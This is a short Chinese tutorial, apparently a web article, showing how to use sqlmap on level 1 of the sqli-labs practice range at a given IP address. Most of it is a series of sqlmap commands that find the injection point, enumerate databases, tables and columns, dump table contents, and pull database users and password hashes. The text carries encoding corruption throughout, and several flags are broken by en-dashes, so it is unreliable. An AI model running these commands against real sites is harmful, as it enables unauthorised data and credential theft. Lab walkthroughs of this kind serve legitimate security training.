SQL注入之sqlmap入門(mén)學(xué)習(xí)
原來(lái)sql注入如此簡(jiǎn)單
以SQL注入靶場(chǎng)sqli-labs第一關(guān)為例,進(jìn)行sqlmap工具的使用分享。
一、判斷是否存在注入點(diǎn)
使用命令:
使用命令:sqlmap -u "http://49.232.78.252:83/Less-1/?id=1"
有圖中白色背景的 則判斷出有注入點(diǎn)

二、查詢(xún)當(dāng)前用戶(hù)下所有數(shù)據(jù)庫(kù)
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --dbs
可以看到有五個(gè)表

三、獲取數(shù)據(jù)庫(kù)中的表名
選取一個(gè)challenges數(shù)據(jù)庫(kù),獲取此庫(kù)的表名
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges --tables

四、獲取表中的字段名
選取表T5M0QG6FM2,獲取其中字段名
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 –columns

五、獲取字段內(nèi)容
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" -D challenges -T T5M0QG6FM2 --columns –dump

六、獲取數(shù)據(jù)庫(kù)的所有用戶(hù)
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –users
使用該命令就可以列出所有管理用戶(hù)

七、獲取數(shù)據(jù)庫(kù)用戶(hù)的密碼
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" –passwords

八、獲取當(dāng)前網(wǎng)站數(shù)據(jù)庫(kù)的名稱(chēng)
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-db

可以看到當(dāng)前的數(shù)據(jù)庫(kù)是 security
九、獲取當(dāng)前網(wǎng)站數(shù)據(jù)庫(kù)的用戶(hù)名稱(chēng)
使用命令:
sqlmap -u "http://49.232.78.252:83/Less-1/?id=1" --current-user
當(dāng)前用戶(hù)是root

到此這篇關(guān)于SQL注入之sqlmap入門(mén)學(xué)習(xí)的文章就介紹到這了,更多相關(guān)sqlmap入門(mén)內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!
相關(guān)文章
CASE表達(dá)式實(shí)現(xiàn)基于條件邏輯來(lái)返回一個(gè)值
針對(duì)一列,基于條件邏輯來(lái)返回一個(gè)值,那么,這時(shí)候就需要使用到CASE表達(dá)式了,下面是具體的應(yīng)用2014-07-07
SqlServer2012中First_Value函數(shù)簡(jiǎn)單分析
SQL SERVER 2012 T-SQL新增幾個(gè)聚合函數(shù): FIRST_VALUE LAST_VALUE LEAD LAG,今天我們首先來(lái)簡(jiǎn)單分析下FIRST_VALUE,希望對(duì)大家有所幫助,能夠盡快熟悉這個(gè)聚合函數(shù)2014-08-08
sqlserver 中一些常看的指標(biāo)和清除緩存的方法
sqlserver 中一些??吹闹笜?biāo)和清除緩存的方法2009-07-07
SQL?Server?2012?搭建數(shù)據(jù)庫(kù)AlwaysOn(數(shù)據(jù)庫(kù)高可用集群)
這篇文章主要介紹了SQL?Server?2012?搭建數(shù)據(jù)庫(kù)AlwaysOn(數(shù)據(jù)庫(kù)高可用集群),需要的朋友可以參考下2023-05-05
異地遠(yuǎn)程訪問(wèn)本地SQL Server數(shù)據(jù)庫(kù)
數(shù)據(jù)庫(kù)的重要性相信大家都有所了解,作為各種數(shù)據(jù)的電子資料夾,其中可能包含了各種信息,這篇文章就為大家介紹了如何使用cpolar內(nèi)網(wǎng)穿透,遠(yuǎn)程連接和操作SQL Server。2023-04-04

